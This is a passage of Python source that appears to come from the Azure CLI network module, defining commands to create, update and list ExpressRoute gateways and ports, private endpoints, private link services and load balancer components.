instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
if min or max:
gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min, max=max))
if tags is not None:
instance.tags = tags
if min is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.min = min_val
if max is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.max = max_val
return instance
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
elif basename.endswith('.pdf') is False:
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
visbility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port,
backend_port, frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
InboundNatRule = cmd.get_models('InboundNatRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
'FrontendIPConfiguration', 'SubResource', 'Subnet')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if not private_ip_address:
instance.private_ip_allocation_method = 'dynamic'
instance.private_ip_address = None
elif private_ip_address is not None:
instance.private_ip_allocation_method = 'static'
instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
raise UnrecognizedArgumentError('vnet should be provided when input subnet name instead of subnet id')
subnet = vnet + f'/subnets/{subnet}'
return subnet
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
# Before 2020-03-01, service doesn't support the other rest method.
# We have to use old one to keep backward compatibility.
# Same for basic sku. service refuses that basic sku lb call the other rest method.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
# when sku is 'gateway', 'tunnelInterfaces' can't be None. Otherwise service will response error
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
